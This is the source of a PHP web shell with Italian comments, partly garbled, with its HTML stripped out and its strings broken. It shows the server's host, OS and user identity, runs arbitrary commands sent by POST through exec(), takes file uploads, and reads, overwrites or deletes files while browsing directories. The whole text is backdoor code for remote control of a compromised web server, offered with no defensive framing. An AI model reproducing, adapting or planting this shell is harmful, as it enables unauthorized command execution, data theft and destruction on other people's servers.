SH





"; print ""; if (is_callable("php_uname")) print ""; if (is_callable("posix_getuid") and is_callable("posix_getgid")) { $uid=posix_getuid(); $uname=posix_getpwuid($uid); $uname=$uname['name']; $gid=posix_getgid(); $gname=posix_getgrgid($gid); $gname=$gname['name']; print ""; print ""; } print "
~ host ".$_SERVER['SERVER_NAME']."
~ server ".$_SERVER['SERVER_SOFTWARE']."
~ os ".php_uname()."
~ uid $uid ($uname)
~ gid $gid ($gname)


"; if (!isset($_POST['file'])) { ?>
> load a file
$ execute a cmd
\n"; print "~ file name: ".$_FILES['userfile']['name']."
". "\n~ type: ".$_FILES['userfile']['type']."
\n". "~ size: ".$_FILES['userfile']['size']." bytes
\n"; } else print "$ Error while loading ".$_FILES['userfile']['name']."
\n"; } # # Modifica o cancellazione di file # if (isset($_POST['dofile'])) { $ref=$_SERVER['HTTP_REFERER']; $fname=htmlentities($_POST['dofile']); $content=$_POST['content']; # # Modifica # if (isset($_POST['save'])) { if (!($fp=fopen($fname,"w"))) die ("$ Unable to write to $fname
\n"); fputs ($fp,$content); fclose($fp); print ("File $fname successfully updated

\n"); } # # Cancellazione # if (isset($_POST['remove'])) { unlink ($fname) or die ("$ Unable to remove $fname
\n"); print "$fname successfully removed

\n"; } } # # Esecuzione di un comando # if (isset($_POST['cmd'])) { $cmd=$_POST['cmd']; $output=array(); exec ($cmd,$output); print "

\n"; print "# cmd output:

"; print "
\n"; foreach ($output as $line) print "$line
\n"; print "
\n"; die(''); } # # Visualizzazione di file # if (isset($_POST['fname'])) { print "# Warning: editing or removing a file is only possible if you've got the privileges to do that

"; $fname=htmlentities($_POST['fname']); $file=file($fname) or print "$ Unable to open $fname
\n"; print "
\n"; print "\n"; print "

\n"; print " Save file\" name=\"save\">\n"; print " Delete file\" name=\"remove\">\n"; print "
\n"; } # # Visualizzazione del contenuto di una directory # if (isset($_POST['dirname'])) $path=htmlspecialchars($_POST['dirname']); else $path=getcwd(); $dp=opendir($path) or die("$ Unable to open $path
\n"); chdir ($path); $path=getcwd(); print "

\n"; print "> cwd: ".getcwd()."

\n\n"; $dir=array(); while ($file=readdir($dp)) if (strcmp(".",$file)) array_push($dir,"$path/$file"); closedir($dp); sort($dir); ?>
\n"; # # Directory superiore # if (basename($dir[$i])==="..") { $tmp=split('/',getcwd()); $new=""; for ($j=0; $jUP\n"; print "\n"; } # # Directory # if (is_dir($dir[$i])) { if (basename($dir[$i])!='..') { print "\n"; print "\n"; print "\n"; } } # # File comune # else { if (basename($dir[$i])!='..') { print "\n"; print "\n"; print "\n"; } } } print "
DIRDIR
FILE".getperms($dir[$i])."
\n"; ?>